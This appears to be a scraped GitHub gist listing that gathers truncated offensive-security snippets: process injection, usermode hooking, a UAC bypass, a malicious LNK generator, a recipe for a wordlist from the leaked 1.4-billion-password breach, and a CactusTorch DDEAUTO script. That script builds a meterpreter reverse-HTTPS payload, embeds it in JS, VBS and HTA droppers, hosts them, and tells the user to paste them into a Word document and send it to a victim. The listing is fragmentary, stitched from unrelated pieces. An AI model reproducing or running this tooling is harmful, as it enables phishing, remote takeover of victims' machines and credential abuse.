

gavz / inject.c
Created December 13, 2017 15:23 — forked from hfiref0x/inject.c
Process Doppelgänging
//
// Ref = src
// https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf
//
#include <Windows.h>
#include <ntstatus.h>
#include "ntos.h"
VOID ProcessDoppelgänging(
gavz / Injectable.cpp
Created December 18, 2017 15:32 — forked from anonymous/Injectable.cpp
Simple UserMode Hook Example
#include <windows.h>
#include <stdio.h>
FARPROC fpCreateProcessW;
BYTE bSavedByte;
// Blog Post Here:
// https://0x00sec.org/t/user-mode-rootkits-iat-and-inline-hooking/1108
// tasklist | findstr explore.exe
gavz / breachcompilation.txt
Created December 19, 2017 16:56
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via (run from the root of the extracted dump; `grep -r` with no path recurses the current directory):
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
(caveat: `uniq` only collapses *adjacent* duplicate lines, so unless the input is already sorted the result still contains repeats; pipe through `sort -u` instead if a fully de-duplicated list is wanted)
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
gavz / syscall_extractor.cpp
Created December 28, 2017 15:42 — forked from hasherezade/syscall_extractor.cpp
Extracts syscalls list from NTDLL.DLL
#include <stdio.h>
#include <Windows.h>
// based on: https://www.evilsocket.net/2014/02/11/on-windows-syscall-mechanism-and-syscall-numbers-extraction-methods/
// author: @evilsocket
// modified by: @hasherezade
#define IS_ADDRESS_BETWEEN( left, right, address ) ( (address) >= (left) && (address) < (right) )
PIMAGE_SECTION_HEADER SectionByRVA( PIMAGE_SECTION_HEADER pSections, DWORD dwSections, DWORD rva )
{
gavz / secadmin-angr.py
Created January 1, 2018 21:18
Secadmin 2017 CTF - Reversing with angr
import angr
import logging
import claripy
def main():
proj = angr.Project('secadmin', load_options={'auto_load_libs': False})
argv = [proj.filename]
argv.append('ctf.hex')
gavz / EventVwrBypass.cs
Created January 4, 2018 17:04 — forked from leoloobeek/EventVwrBypass.cs
Event Viewer UAC Bypass in CSharp for use with InstallUtil.exe
using System;
using System.Linq;
using System.Reflection;
using System.Configuration.Install;
using System.Runtime.InteropServices;
using Microsoft.Win32;
/*
InstallUtil.exe C# version of Event Viewer UAC bypass
from ctypes import *
from ctypes.wintypes import *
import winreg
NTSTATUS = c_long
PVOID = c_void_p
PWSTR = c_wchar_p
OBJ_CASE_INSENSITIVE = 0x00000040
gavz / listkmods.py
Created January 10, 2018 20:24 — forked from patois/listkmods.py
ida/vmware kernel debugging helper
from idaapi import *
# with code taken from http://hexblog.com/idapro/vmware_modules.py
class LoadedModulesList(Choose2):
def __init__(self, title, flags=0, width=None, height=None, embedded=False, modal=False):
self.ptr = get_name_ea_simple("PsLoadedModuleList")
if self.ptr == BADADDR:
raise ValueError('Missing symbol: PsLoadedModuleList')
function Create-LNKPayload{
<#
.SYNOPSIS
Generates a malicous LNK file
.PARAMETER LNKName
Name of the LNK file you want to create.
gavz / CactusTorchDDEAUTO.sh
Created January 21, 2018 15:45 — forked from xillwillx/CactusTorchDDEAUTO.sh
CactusTorchDDEAUTO
git clone https://github.com/mdsecactivebreach/CACTUSTORCH.git && cd CACTUSTORCH
IP=`ip -4 addr show eth0 | grep -oP '(?<=inet\s)\d+(\.\d+){3}'`
msfvenom -p windows/meterpreter/reverse_https LHOST=$IP LPORT=443 -f raw -o payload.bin
PAYLOAD=$(cat payload.bin | base64 -w 0)
sed -i -e 's|var code = ".*|var code = "'$PAYLOAD'";|' CACTUSTORCH.js
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.vbs
sed -i -e 's|Dim code : code = ".*|Dim code : code = "'$PAYLOAD'"|g' CACTUSTORCH.hta
cp -t /var/www/html/ CACTUSTORCH.vbs CACTUSTORCH.js CACTUSTORCH.hta
service apache2 start
echo -e "\n\n\n\nOpen Microsoft Word and press CTRL+F9 and copy any of the payloads below in between the { } then save and send to victim.\n\nJS PAYLOAD:\n\